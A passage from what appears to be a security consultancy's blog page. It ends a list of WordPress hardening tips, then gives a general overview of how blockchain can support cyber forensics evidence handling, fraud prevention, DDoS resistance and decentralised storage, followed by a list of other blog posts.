Most top online websites like Google, Facebook, Twitter, allow you to enable it for your accounts. You can also add the same functionality to your WordPress site.

5.   Strong Passwords and User Permissions

Many systems and applications include functionality that prevents a user from setting a password that does not meet certain criteria. Functionality such as this should be leveraged to ensure only Strong passwords are being set.

6. Keep WordPress Updated

Since WordPress is open-source, anyone can study the source code to learn and improve it. You need to make sure that all your WordPress plugins, themes, and the core itself are always up to date.

7.   Disable Directory Indexing and Browsing

Directory browsing can be used by hackers to find out if you have any files with known vulnerabilities, so they can take advantage of these files to gain access. Directory browsing can also be used by other people to investigate your files, copy images, find out your directory structure, and other information. Therefore, it is highly recommended that you turn off directory indexing and browsing.

Introduction

Blockchain is an emerging technology that is quite popular nowadays due to the popularity of cryptocurrency. Apart from blockchain being used in cryptocurrency, it is also marketed as a cure for a lot of things including cybersecurity. Blockchain is considered to be a nearly impenetrable technology as by design, blockchain is resistant to modification of the data. The blockchain contains a list of records or blocks which are linked using cryptography. Each of those individual records/blocks contains information and data that are combined together and verified. Information such as a cryptographic hash function of the previous block, timestamp, and transaction details are permanently recorded in a distributed ledger. The ledger is decentralized in nature, all transactions are done across a peer-to-peer network. Blockchain technology is designed in such a way that there is no central authority or storage location. Every user on the network plays a part in storing some or all of the blockchain. Everyone is responsible for verifying the data that is stored and/or shared to make sure false data cannot be added and existing data cannot be removed.

Blockchain technology has been around for more than a decade. It was invented by a person using the name Satoshi Nakamoto in 2008 to serve as the public transaction ledger of the cryptocurrency bitcoin. However, as technology has gradually spread worldwide, people have begun using it in a variety of ways in numerous industries, including as a means to increase cybersecurity. Blockchain is a chain of records that leads to the formation of a distributed network that can have millions of users all over the world. Every user can add information to the blockchain and all data in the blockchain is secured through cryptography. Every other member of the network is responsible for verifying that the data being added to the blockchain is real. This is done using a system of three keys private, public, and the receiver’s key that allow members to check the veracity of the data while also confirming whom it comes from. The verified data then form a block and will be added to the chain of data. In order to make updates to a particular piece of data, the owner of that data must add a new block on top of the previous block, creating a very specific chain of code.

Blockchain Implementation in Cyber Forensics

The network being accessed by an unauthorized person can lead to data being either stolen or damaged. Hence, it becomes essential for an individual or organization to determine the invasion. The mode of collecting and preserving evidence has a significant role to play in ensuring that the evidence is accountable in the courtroom during various situations such as lawsuits or criminal complaints.

Identifying the attack/breach and generating the required documents about the causes of cyber-attack or cyber fraud can be accountable through the use of blockchain technology. Truth-based evidence is always important in any cybercrime investigation. Digital evidence moves down the hierarchy through the chain of custody in the different levels of transactions in any investigation process. Blockchain technology can provide a clear and exhaustive view of the transactions that have taken place concerning the evidence, right from the time the evidence originated from the source [2].

There are many reported cases of missing police evidence and several of them go unaccounted for giving an easy way out for criminals, such types of things can also be prevented using blockchain technology. It can enable appropriate authorization to those who are permitted to enter the evidence room, whether electronic, magnetic, or by using private keys. The scientific approach in digital forensics flow through the search authorities, the chain of custody of evidence, imaging and hashing function, validation of data using appropriate tools, reportability, and repetition of presentation. The entire process can be made data-centric using blockchain technology.

The hash validation with the blockchain and the timestamp will prevent repeatability and contamination of information. Keeping a clear and unique track of who accessed what and when will help to avoid the contamination of evidence and information. The blockchain technology-based application can be used to ensure proper operating practice when it comes to evidence management practices. Necessary questions like How the core data is stored, how it is communicated, who is the person responsible for handling the data, and the factors that contribute to the physical security of the data can all be streamlined efficiently. Ideas such as working with the duplicate copy and not with the original can be validated using the hash. The Hash function will take the data and will generate a fixed-sized bit sequence in the output. Thus, creating a digital fingerprint of the input data.

Blockchain Implementation in Cyber Security

The number of people joining the world wide web and technology is continuously growing and developing at a very fast rate, more data gets produced and more hackers will attempt to steal or corrupt that data. The technology behind blockchain is flexible and unbelievably helpful for the future of the Internet, permitting users to better secure their data. Innovative uses for blockchain technology are already becoming a part of other fields beyond cryptocurrencies and can be especially useful to boost cybersecurity. Blockchain implementation will facilitate in forestall a lot of threats and attacks in a very system and might forestall the information from being taken or destroyed. A number of the items that blockchain will facilitate are: –

  I.       Preventing Fraud and Theft of data: – Blockchain technology provides one of the best securities to protect data from hackers by preventing potential fraud and decreasing the chance of data being stolen or compromised. In order to destroy or modify blockchain, a hacker would have to destroy the data stored on every user’s computer in the global network. This could be millions of computers, with each one storing a copy of some or all the data. Bigger blockchain networks with more users have an infinitely lower risk of getting attacked by hackers because of the complexity required to penetrate such a network.

   II.       Preventing Distributed Denial of Service (DDOS) Attacks: – Hackers can use several techniques to launch an attack, most common is sending a large number of requests/packets to the system until the system becomes unable to process these requests/packets and leading to the failure/crash of the system. DDoS attacks have been happening at an increased frequency recently, affecting bigger companies like Twitter, Spotify, SoundCloud, and more. The current difficulty in preventing DDoS attacks comes from the existing Domain Name System (DNS). The fact that it is only partially decentralized means that it is still vulnerable to hackers because they are able to target the centralized part of DNS and continue crashing one website after another. Implementing blockchain technology would fully decentralize DNS, distributing the contents to a large number of nodes and making it nearly impossible for hackers to attack. Domain editing rights would only be granted to those who need them (domain owners) and no other user could make changes, significantly reducing the risk of data being accessed or changed by unauthorized parties.

  III.       Decentralized Storage Solutions: –

Data is becoming more valuable than gold and oil. Every business and individuals accumulate tones of sensitive data about themselves or customers. Unfortunately, this data is also quite attractive to hackers. And one of the most convenient things you do for cybercriminals is to store all of it in one place. The business mainly is still using centralized storage when it comes to data. Blockchain-based storage solutions are slowly gaining popularity. An example of this can be Apollo data cloud which is developed by the Apollo Currency team allows users to archive data on the blockchain and grant permission for access to third parties. The cryptographic access key can be revoked at any time, further reducing the risk of a breach. Thanks to the decentralized nature of blockchain technology, hackers no longer have a single point of entry, nor can they access entire repositories of data in the event that they do get in.

October 20, 2022
Common Cybersecurity Threats, their prevention, and possible Mitigation

In order to protect your business from common cybersecurity threats, it is important to be aware of the different types of attacks that exist and how to prevent them.

Read More
September 19, 2022
Guidelines on Digital Lending by Reserve Bank of India

Read what RBI has to say on digital lending in the Guideline on Digital Lending issued on 2nd September 2022.

Read More
August 4, 2022
What’s Buy Now Pay Later (BNPL)? Why is it in the news?

The concept of BNPL is similar to that of credit cards wherein a consumer makes a purchase through a credit line and the payment is done later.

Read More
May 16, 2022
Why Security Architecture Review is important for Cyber Security?

Security Architecture Review is a holistic review of security that covers networks, Data, Applications, Endpoint, Cloud, etc.

Read More
March 10, 2021
Top 5 Benefits of Cloud Infrastructure Security 2022

Companies are realizing the benefits of cloud infrastructure. They are quicker to scale, cheaper to maintain, and more flexible.

Read More
February 10, 2021
Five Board Questions That Security and Risk Leaders Must Be Prepared To Answer

As board members realize how critical risk and security management is, they ask leaders more nuanced and complex questions.

Read More
January 1, 2021
New Year 2021 Resolution for the CISO

With the year 2022 and the pandemic overwhelming us, we must be conscious of the increase in cyber security threats that are looming in front of us.

Read More
December 10, 2020
Best Practices For Conducting Cybersecurity Audits In Crisis Situation

Global situations relating to the COVID-19 pandemic have impacted the business and has also impacted the work of auditors.

Read More
November 10, 2020
Privilege Escalation by Exploiting WordPress Vulnerability

WordPress is a free and open-source PAAS structure that is being used by millions across the globe as a content management system.

Read More
October 10, 2020
Blockchain Implementation in Cyber Security and Cyber Forensics

Blockchain is an emerging technology that is quite popular nowadays due to the popularity of cryptocurrency.

Read More
September 10, 2020
Malvertisements

Malvertisements are a malicious advertisement distributed in the same was as a legitimate online advertisement. It is one of the common practices to use spread malware.

Read More
August 10, 2020
Employee Testimonial: Anamika Patil

CyRAACS is a great place to work because every day provides an opportunity to learn something new, to mentor and to be mentored to achieve our client’s goals.

Read More
© COPYRIGHT 2022, ALL RIGHTS RESERVED
crossmenu linkedin facebook pinterest youtube rss twitter instagram facebook-blank rss-blank linkedin-blank pinterest youtube twitter instagram